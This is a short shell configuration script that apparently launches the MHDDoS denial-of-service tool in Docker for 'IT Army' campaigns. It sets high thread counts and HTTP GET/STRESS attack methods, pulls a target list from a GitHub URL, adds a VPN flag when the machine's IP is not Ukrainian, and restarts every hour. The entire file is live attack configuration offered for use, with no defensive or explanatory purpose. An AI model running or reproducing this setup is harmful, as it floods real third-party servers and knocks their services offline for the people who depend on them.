CONTAINER_NAME=mhddos_1
DOCKER_OPTIONS="-it --rm --pull always --log-driver none --name $CONTAINER_NAME"

VPN=""

if [[ -z $(curl -s https://api.myip.com | grep -i UA) ]]
then
  VPN="--vpn"
fi

if [[ $LITE ]]
then
  THREADS=800
  COPIES=1
  DOCKER_OPTIONS="--cpus=.7 $DOCKER_OPTIONS"
else
  THREADS=5000
  COPIES=2
fi

ATTACK_OPTIONS="--http-methods GET STRESS -t $THREADS --copies $COPIES $VPN --itarmy"

TARGETS_URL=https://raw.githubusercontent.com/psyipm/itarmy/main/targets.lst

RESTART_IN=3600 # 1 hour
